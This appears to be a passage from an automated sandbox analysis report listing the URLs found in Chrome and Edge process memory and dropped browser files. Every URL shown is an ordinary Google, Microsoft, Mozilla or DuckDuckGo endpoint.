    Source: chrome.exe, 00000010.00000003.3409414888.00000808003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3409610557.00000808003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3451564016.000008080080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
    Source: chrome.exe, 00000010.00000003.3409414888.00000808003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3409610557.00000808003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3451564016.000008080080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/2$
    Source: chrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3409836818.0000080800694000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/
    Source: chrome.exe, 00000010.00000003.3409414888.00000808003A0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3409610557.00000808003AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3451564016.000008080080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromekanonymityquery-pa.googleapis.com/2O
    Source: chrome.exe, 00000010.00000003.3423082645.00004EB40033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3418796194.00004EB40033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3415865055.00004EB40033C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/events
    Source: chrome.exe, 00000010.00000003.3423082645.00004EB40033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3418796194.00004EB40033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3415865055.00004EB40033C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chromereporting-pa.googleapis.com/v1/record
    Source: msedge.exe, 00000013.00000002.3649864394.000027F00238C000.00000004.00000800.00020000.00000000.sdmp, manifest.json.21.drString found in binary or memory: https://chromewebstore.google.com/
    Source: chrome.exe, 00000010.00000003.3405798272.000033DC002E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://clients2.google.com/cr/report
    Source: chrome.exe, 00000010.00000003.3412812568.00004EB4004A4000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000013.00000002.3649206251.000027F002254000.00000004.00000800.00020000.00000000.sdmp, manifest.json0.21.drString found in binary or memory: https://clients2.google.com/service/update2/crx
    Source: 79HDJ5.11.drString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
    Source: 79HDJ5.11.drString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
    Source: chrome.exe, 00000010.00000003.3459040254.00004EB4013B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/report-to/gws/none
    Source: Reporting and NEL.22.drString found in binary or memory: https://deff.nelreports.net/api/report
    Source: 2cc80dabc69f58b6_0.21.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
    Source: Reporting and NEL.22.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msnw
    Source: manifest.json0.21.drString found in binary or memory: https://docs.google.com/
    Source: chrome.exe, 00000010.00000003.3450105563.00004EB40142C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/d/1z2sdBwnUF2tSlhl3R2iUlk7gvmSbuLVXOgriPIcJkXQ/preview29
    Source: manifest.json0.21.drString found in binary or memory: https://drive-autopush.corp.google.com/
    Source: manifest.json0.21.drString found in binary or memory: https://drive-daily-0.corp.google.com/
    Source: manifest.json0.21.drString found in binary or memory: https://drive-daily-1.corp.google.com/
    Source: manifest.json0.21.drString found in binary or memory: https://drive-daily-2.corp.google.com/
    Source: manifest.json0.21.drString found in binary or memory: https://drive-daily-3.corp.google.com/
    Source: manifest.json0.21.drString found in binary or memory: https://drive-daily-4.corp.google.com/
    Source: manifest.json0.21.drString found in binary or memory: https://drive-daily-5.corp.google.com/
    Source: manifest.json0.21.drString found in binary or memory: https://drive-daily-6.corp.google.com/
    Source: manifest.json0.21.drString found in binary or memory: https://drive-preprod.corp.google.com/
    Source: manifest.json0.21.drString found in binary or memory: https://drive-staging.corp.google.com/
    Source: chrome.exe, 00000010.00000003.3423267040.00004EB40127C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive-thirdparty.googleusercontent.com/32/type/
    Source: manifest.json0.21.drString found in binary or memory: https://drive.google.com/
    Source: chrome.exe, 00000010.00000003.3423082645.00004EB40033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3418796194.00004EB40033C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3415865055.00004EB40033C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
    Source: Q16P8Y.11.dr, UAS0ZM.11.dr, Web Data.21.drString found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: Q16P8Y.11.dr, UAS0ZM.11.dr, Web Data.21.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: Q16P8Y.11.dr, UAS0ZM.11.dr, Web Data.21.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: 000003.log0.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/addressbar_uu_files.en-gb/1.0.2/asset?sv=2017-07-29&sr
    Source: 000003.log0.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
    Source: 000003.log0.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr
    Source: 000003.log1.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
    Source: HubApps Icons.21.dr, 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
    Source: HubApps Icons.21.dr, 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
    Source: HubApps Icons.21.dr, 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
    Source: HubApps Icons.21.dr, 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
    Source: 000003.log0.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
    Source: HubApps Icons.21.dr, 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
    Source: HubApps Icons.21.dr, 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
    Source: HubApps Icons.21.dr, 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
    Source: HubApps Icons.21.dr, 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
    Source: 000003.log0.21.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/signal_triggers/1.13.3/asset?sv=2017-07-29&sr=c&sig=Nt
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
    Source: 6787dde9-9232-42bc-9546-5974a5435404.tmp.21.drString found in binary or memory: https://gaana.com/
    Source: chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/
    Source: chrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/$m
    Source: chrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/%j
    Source: chrome.exe, 00000010.00000003.3452571288.00004EB401508000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452595465.00004EB40150C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3452646215.00004EB401510000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://google-ohttp-relay-join.fastly-edge.com/(j
